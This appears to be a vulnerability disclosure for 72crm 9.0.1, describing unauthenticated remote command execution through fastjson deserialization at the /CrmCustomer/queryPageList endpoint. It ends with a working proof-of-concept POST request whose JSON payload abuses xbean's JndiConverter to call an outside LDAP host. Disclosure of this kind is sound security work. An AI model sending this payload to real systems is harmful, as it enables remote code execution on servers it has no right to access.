Remote command execution vulnerability #28
Description
In version 72crm_9.0.1_20191202, insecure components are used, which causes potential remote command execution. Attackers can directly attack the system without authorization.
An insecure version of the fastjson component was used
First we found a vulnerability trigger :
http://localhost:8080/CrmCustomer/queryPageList
The construction method of BasePageRequest is called for processing. In the process of processing, the parseObject() method of fastjson is first called to parse the json string into a java bean. Due to the deserialization vulnerability of this version of fastjson, Attackers just visit: / CrmCustomer/queryPageList, and enter the malicious json string, can trigger a loophole
There are many attack modes in version 1.2.54, and only one of them is shown below:
This attack requires the xbean jar package to be introduced and AutoType to be enabled
Start the attack
POC :
POST /CrmCustomer/queryPageList HTTP/1.1
Host: localhost:8080
Content-Length: 115
Content-Type: application/json;charset=UTF-8
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
Connection: close
{"@type":"org.apache.xbean.propertyeditor.JndiConverter","AsText":"ldap://ip:port/Basic/Command/calc"}"